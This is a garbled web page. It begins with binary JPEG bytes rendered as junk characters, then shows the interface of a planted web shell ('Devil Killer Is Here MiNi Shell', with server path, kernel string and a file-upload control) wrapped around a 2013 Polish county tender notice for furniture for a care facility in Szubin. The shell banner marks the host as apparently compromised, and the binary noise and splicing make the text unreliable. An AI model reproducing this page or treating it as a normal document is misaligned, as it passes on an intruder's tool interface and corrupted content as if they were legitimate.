JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130215/64370-N-2013.html

<p class="kh_header"><b>Nakło nad Notecią: Przetarg nieograniczony na dostawę mebli wraz z wyposażeniem i ich rozmieszczenie w lokalu wg wskazań Zamawiającego, do Placówki Opiekuńczo-Wychowawczej w Szubinie, ul. Kochanowskiego 1</b><br>
<b>Numer ogłoszenia: 64370 - 2013; data zamieszczenia: 15.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Nakielskiego , ul. Gen. H. Dąbrowskiego 54, 89-100 Nakło nad Notecią, woj. kujawsko-pomorskie, tel. 052 3866628, faks 052 3860771.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nakielski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę mebli wraz z wyposażeniem i ich rozmieszczenie w lokalu wg wskazań Zamawiającego, do Placówki Opiekuńczo-Wychowawczej w Szubinie, ul. Kochanowskiego 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest 
Dostawa mebli wraz z wyposażeniem i ich rozmieszczenie wraz z montażem 
na miejscu w lokalu wg wskazań Zamawiającego, do Placówki Opiekuńczo-Wychowawczej w Szubinie, ul. Kochanowskiego 1.
Zamówienie obejmuje: dostarczenie, transport, złożenie i montaż, usunięcie opakowań związanych z dostawą i montażem mebli, ustawienie na miejsce docelowe, wypoziomowanie, wstępne konserwacje oraz przystosowanie do ich użytkowania (tj. mycie, czyszczenie), co roczny bezpłatny przegląd mebli przez okres trwania gwarancji, serwis pogwarancyjny odpłatny na podstawie wyceny z fabryki mebli, będą po kosztach własnych bez naliczania dodatkowych marż.
Wszystkie oferowane i dostarczone elementy meblowe wraz z wyposażeniem muszą spełniać minimalne wymagania bezpieczeństwa i higieny pracy oraz ergonomii zawarte w Rozporządzeniu Ministra Pracy i Polityki Socjalnej z dnia 1 grudnia 1998 roku 
w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r., Nr 148, poz. 973).
Na wszystkie meble i wyposażenie Zamawiający wymaga udzielenia 36 miesięcznej gwarancji. Dostarczony towar musi być fabrycznie nowy i wolny od wad. 
Zamawiający zaleca, aby na etapie przygotowania oferty, dokonać wizję lokalną 
w budynku Placówki Opiekuńczo-Wychowawczej w Szubinie, ul. Kochanowskiego 1. Osobą uprawnioną do kontaktu w tej kwestii jest Sebastian Hałas, tel. 52 325 17 29, e-mail: sebastian.halas@pcpr-naklo.pl (w dni robocze od godz. 8.30 - 14.00).

Uwaga!
Wykonawca w dniu podpisania umowy przedstawi Zamawiającemu paletę kolorów (próbki) laminatów, drewna i elementów tapicerowanych.
1. Elementy meblowe
Oferowane i dostarczone meble muszą być wykonane z godnie z normami dotyczącymi jakości mebli biurowych. Biurka, dostawki, stoły konferencyjne zgodnie z: PN-EN 527-1:2004, PN-EN 527-2:2004, PN-EN 527-3:2004; szafy, kontenery zgodnie z: PN-EN 14074:2006, PN-EN 14073-2:2006, PN-EN 14073-3:2006
Wszystkie zawiasy z dożywotnią gwarancją.
Płyta użyta do produkcji mebli powinna spełniać normę PN EN 14322, emisja formaldehydu odpowiadająca klasie E1.
Badania powinny być potwierdzone certyfikatem wystawionym przez niezależną instytucję uprawnioną do wystawiania takich certyfikatów. Certyfikat zostanie przedstawiony zamawiającemu w dniu podpisania umowy. 
2. Elementy meblowe tapicerowane	
Oferowane i dostarczone meble muszą być wykonane z godnie z normami dotyczącymi jakości mebli biurowych. Fotele obrotowe zgodnie z PN EN 1335- 2:2002; PN EN 1335-3:2002; PN - F - 06108 - 6:1997. Zastosowany materiał powinien spełniać warunki trudno zapalności, odporność na ścieranie nie może być niższa niż 50 000 cykli Martindale.
Biurko młodzieżowe - sztuk 14. 
Wymiary 120x60 cm, wysokość 72 cm, blat o grubości 18mm wykonany z płyty obustronnie laminowanej o klasie higieniczności E1, oklejonej obrzeżem ABS o grubości 2 mm 
w kolorze blatu, na nogach o przekroju kwadratowym 50x50 mm, profile zamknięte posiadające stopki umożliwiające poziomowanie biurka w zakresie 15 mm, z prawej strony cztery szuflady zamykane na zamek centralny, prowadnica rolkowa. Cała konstrukcja montowana jest bez kleju, na złącza mimośrodowe. Blat biurka wyposażony w przelotkę na kable w kolorze szarym lub kolorze blatu, o średnicy od 5-8 cm. Okucia 
z dożywotnią gwarancją. Kolorystyka: kolor do wyboru przez Zamawiającego.
Biurko gabinetowe - sztuk 3,
Wymiary 160x65. Wysokość 78cm. blat o grubości 18mm wykonany z płyty obustronnie laminowanej o klasie higieniczności E1, oklejonej obrzeżem ABS o grubości 2 mm 
w kolorze blatu, na nogach o przekroju kwadratowym 50x50 mm, profile zamknięte posiadające stopki umożliwiające poziomowanie biurka w zakresie 15 mm. Z lewej strony szafka z trzema półkami wewnątrz, z prawej strony cztery szuflady zamykane 
na zamek centralny, prowadnica rolkowa. Cała konstrukcja montowana jest bez kleju, na złącza mimośrodowe. Biurko wyposażone w półkę do klawiatury komputerowej. Blat biurka wyposażony w przelotkę na kable w kolorze szarym lub kolorze blatu, o średnicy od 5-8 cm. Okucia z dożywotnią gwarancją. Kolorystyka: kolor do wyboru przez Zamawiającego.
Krzesło obrotowe - szt. 20.
Krzesło obrotowe na kółkach, z mechanizmem synchronicznym, na podnośniku gazowym. Siedzisko o wymiarach 44/45x44/45, wysokość oparcia 48-52, szerokość oparcia 39-41, oparcie tapicerowane, tylna osłona siedziska i oparcia z tworzywa sztucznego. Profilowane oparcie w części lędźwiowej. Siedzisko z pianki wylewanej zaokrąglone w części frontowej. Szkielet siedziska na bazie formatki sklejkowej, nie dopuszcza się krzesła z wypełnieniem z pianki ciętej. Podłokietniki z regulacją wysokości i kąta, z nakładkami poliuretanowymi. Podstawa pięcioramienna, stalowa. Oparcie posiada 5 pozycji blokowania położenia odchylenia, z mechanizmem antischock - zapobiegającym uderzeniu oparcia w plecy. Wychył oparcia w zakresie 19 stopni, 8 stopni siedzisko. Krzesło musi posiadać kółka min. fi 50 mm, samohamowne, przystosowane do twardych powierzchni. Mechanizm synchroniczny z 5 stopniową regulacją wysokości oparcia. Fotel tapicerowany tkaniną z atestem trudnopalności papieros (BS EN 1021-1), zapałka (BS EN 1021-2), 100% wełna specjalnie zabezpieczona, o klasie ścieralności na poziomie 50 000 cykli (PN-EN ISO 12947-2), odporności na piling 4 (ISO 105-X12). Krzesło spełnia normę określającą obrotowe krzesła biurowe PN EN 1535.
Kolorystyka: Tapicerka w kolorze antracyt, tył oraz baza fotela w kolorze szary metalic.
Wieszak - sztuk 2.
Wykonany z blachy grubości 1,5mm o profilu okrągłym fi 60, malowany proszkowo 
w kolorze czarnym. Wieszak montowany z elementów: dolna część ze stopkami nadająca całej konstrukcji stabilności, górny element posiada osiem haczyków 
na ubrania zakończonych osłoną z tworzywa. Wieszak z miejscem na parasole.
Łóżko metalowe z szufladą - sztuk 14.
Wymiary 200x90xh40 cm (wysokość łóżka - linia brzegowa dolna, licząc od podłogi 
do stelażu, na którym będzie położony materac). Stelaż łóżek metalowy - profil 25 mm/25 mm, malowany proszkowo w kolorze czarnym, Obudowa stelażu: płyta laminowana o grubości 18 mm oklejona obrzeżem PCV o grubości 2 mm. Płyta winna chować min. 80% grubości zamawianego materaca, opisanego niżej. Szuflada jezdna, na kółkach bez wieka, chowana pod łóżkiem w całości. Uchwyty do skrzyni: długość max: 16 cm, wyoblone krawędzie: satyna lub stal drapana. Można zastosować podcięcie we froncie. Kolor płyty: - Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki).
Szafa na ubrania wiszące - sztuk 14.
Wymiar 80x210x54cm. Szafa z płyty laminowanej o grubości 18 mm (skrzynia), oklejane okleiną PCV na krawędzi frontowej, korpus wzmocniony, tył szafy z co najmniej trzema poprzeczkami wzmacniającymi, zawiasy stalowe, drążek ubraniowy fi 28. Na dole, w odległości 30 cm od dołu szafy, zamontowana na stałe 1 półka wewnętrzna. Wieniec dolny oraz górny z płyty o grubości 25 mm z doklejką PCV 
w kolorze płyty. Wieniec dolny wyposażony w plastikowe nóżki umożliwiające regulację wysokości w zakresie min. 15 mm (poziomowanie szafy). Szafa wyposażona w 20 sztuk wieszaków drewnianych lub PCV. Zawiasy stalowe, minimum po 4 na skrzydło. Okucia z dożywotnią gwarancją Kolor płyty: - Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki ).

Szafa na ubrania leżące - sztuk 14.
Wymiar 50x210x54 cm Szafy z płyty laminowanej o grubości 18 mm (skrzynia), minimum 5 półek z płyty o grubości 18 mm, oklejane okleiną PCV na krawędzi frontowej - rozstaw półek możliwy do regulacji w kilku poziomach. Wieniec dolny oraz górny płyty o grubości 25 mm z doklejką PCV w kolorze płyty. Wieniec dolny wyposażony 
w plastikowe nóżki umożliwiające regulację wysokości (poziomowanie szafy). Zawiasy stalowe, minimum po 4 na skrzydło. Okucia z dożywotnią gwarancją Kolor płyty: - Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki ).
Szafka nocna z szufladą - sztuk 14.
Wykonana z płyty laminowanej o grubości 18 mm, zawiasy stalowe, wymiary 40x65x40. Wewnątrz szafki 1 półka wykonana z materiału jak pozostała część szafki. Do drzwi szaf wmontowany zamek - szt. 1. Szafka wyposażona w plastikowe nóżki umożliwiające regulację wysokości w zakresie min. 15 mm (poziomowanie szafy). Okucia z dożywotnią gwarancją. Kolor płyty: Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki).
Półka wisząca - sztuk 14.
Wykonana z płyty laminowanej o grubości 18 mm, wymiary 140x45x25cm. Kolor płyty: - Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki).
Materac sprężynowy - szt. 14.
Sprężyny bonelowe, z wysokogatunkowego drutu 2,2 mm. Wkład w materacu: jedna strona lateksowana płytą kokosu (grubość min. 0,9 cm), pianka poliuretanowa T25-15 mm oraz przekładka tapicerska, druga warstwa przekładka tapicerska i pianka poliuretanowa T25-20 mm o zwiększonej sprężystości. Materiał wierzchni odporny 
na zaplamienia. Materac winien być dopasowany do wymiarów łóżka metalowego 
z szufladą. Wysokość materaca 15-23 cm. Gwarancja na materac - 24 miesiące.
Stolik okolicznościowy, salonowy, okrągły - sztuk 3.
Materiał -drewno dąb, O 100 cm. Wysokość 45-55cm. Lakierowane lakierem odpornym na UV, zarysowania i wodę. Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki).
Szafa aktowa - szt. 3.
Wymiar 80x210x40cm Wykonana z płyty wiórowej obustronnie wyklejonej laminatem - drzwi (18mm) oraz wieniec górny (25mm), grubości 18mm wykończona obrzeżem pcv 2mm. Drzwi szafy zachodzące na wieniec dolny a pod wieniec górny korpusu szafy, zamykane zamkiem. Wnętrze szafy przystosowane do przechowywania segregatorów, półki z regulacją wysokości. Okucia z dożywotnią gwarancją. Szafy na stopkach 
z regulacją poziomu. Cała konstrukcja montowana jest bez kleju, na złącza mimośrodowe
Krzesła - szt. 16.
Wysokość siedziska 46-47 cm, całkowita wysokość 85-90 cm, szerokość siedziska 44-45, długość siedziska 40-41. Materiał drewno dąb. Lakierowane lakierem odpornym na UV, zarysowania, ścieranie, środki chemii gospodarstwa domowego i wodę. Krzesła mają spełniać warunki adaptacji do warunków jadalni. Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki).
Regał na gry i zabawki typ salonowy - szt. 2.
Materiał drewno dąb, wymiar 80x210x40cm, przymocowanych na stałe 5 pułek.
Sofa trzyosobowa z podłokietnikami - szt. 3.
Obicie ze skóry ekologicznej kolor do wyboru przez zamawiającego, Wypełnienie pianka wysoko elastyczna, Nóżki drewniane, Stelaż wykonany z elementów z drewna 
i płyty meblowej.
WYMIARY :
Szerokość całkowita 	220 cm
Głębokość całkowita	102 cm
Wysokość	89 cm
Głębokość siedziska	59 cm
Grubość siedziska	21 cm ? 1 cm
Wysokość siedziska	52 cm
Wysokość oparcia	58 cm ? 1 cm
Grubość oparcia	20 cm ? 1 cm
Wysokość nogi	5,5 cm
Szerokość podłokietnika	25,5 cm ? 1 cm

Fotele salonowe - szt. 2.
Wypełnienie siedzisk , pianka poliuretanowa wysoko elastyczna, oraz sprężyna falista 
o długości 52 cm (5 sztuk), Nóżki drewniane, Obicie ze skóry ekologicznej kolor 
do wyboru przez zamawiającego, Stelaż wykonany z elementów z drewna i płyty meblowej.
Szerokość całkowita 	110 cm
Głębokość całkowita	102? 1 cm
Wysokość  z poduchami	1001?  cm
Wysokość bez  poduch	89? 1 cm
Szerokość siedziska	47? 1 cm
Głębokość siedziska	59? 1 cm
Grubość siedziska	21 cm ? 1 cm
Wysokość siedziska	52 ?1cm
Wysokość oparcia	58 cm ? 1 cm
Grubość oparcia	20 cm ? 1 cm
Wysokość nogi	5,5 cm?0,5cm
Szerokość podłokietnika	30,5 cm ? 1 cm

Szafka pod RTV - szt. 1.
Wymiary: 65 wys. 180 szer. 40gł, materiał dąb, na nogach drewnianych. Lakierowane lakierem odpornym na UV, zarysowania, ścieranie, środki chemii gospodarstwa domowego i wodę. Szafa w 1/3 zamykana drzwiami zamykanymi na klucz, plecy pełne z płyty. Blat 28mm, drzwi 18mm., zawiasy stalowe. Okucia z dożywotnią gwarancją. Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki).
Szafka gospodarcza - szt. 1. 
Zwiększona odporność na uszkodzenia i wodę. Doposażenie w uchwyty na sprzęt sprzątający oraz 4 pułki. Wymiary 80x210x50. Do drzwi szafy wmontowany zamek patentowy. Zawiasy i prowadnice wzmocnione. Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki).
Stolik komputerowy - sztuk 4.
1-osobowy na stelażu z rury stalowej o przekroju 38 x 20 mm, malowanej proszkowo kolorem czarnym. Blat z wysuwaną półką na klawiaturę oraz półka pod jednostkę centralną komputera wykonane z płyty melaminowej o gr. 18 mm w kolorze wybranym przez zamawiającego. Wykonawca przedstawi Zamawiającemu kilka propozycji 
do wyboru (próbki).
Stół do jadalni - szt. 1, 
Materiał drewno dąb. Lakierowane lakierem odpornym na UV, zarysowania, ścieranie, środki chemii gospodarstwa domowego i wodę. Wymiary 560x110x78cm. Kolor wybrany przez zamawiającego. Wykonawca przedstawi Zamawiającemu kilka propozycji do wyboru (próbki).
Krzesło konferencyjne - szt. 4,
siedzisko na wysokości 43-46 cm, całkowita wysokość 76-84cm, szerokość 54-60cm, głębokość siedziska 40-45cm. Miękkie tapicerowane siedzisko i oparcie. Metalowa rama krzesła, malowana proszkowo kolorem czarnym. Na ramę montowane drewniane podłokietniki. Kolor tapicerowania - czarny.

Zaoferowanie przedmiotu zamówienia sprzecznego z wymaganiami Zamawiającego skutkować będzie odrzuceniem oferty
Wykonawca składa jedną ofertę na całość zamówienia.
Zamawiający nie dopuszcza składania ofert częściowych, wariantowych 
i alternatywnych.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
Zamawiający informuje, że nie przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7.
Zamawiający nie przewiduje rozliczeń z wykonawcą w walutach obcych.
Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
Zamawiający nie przewiduje wymagań określonych w art. 29 ust. 4 Pzp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu 
i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu 
i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu 
i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu 
i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu 
i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty - załącznik nr 1 do SIWZ;
2. pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika;
3. specyfikacja techniczna oferowanych mebli, potwierdzająca spełnienie wszystkich parametrów podanych w opisie przedmiotu zamówienia.</p>
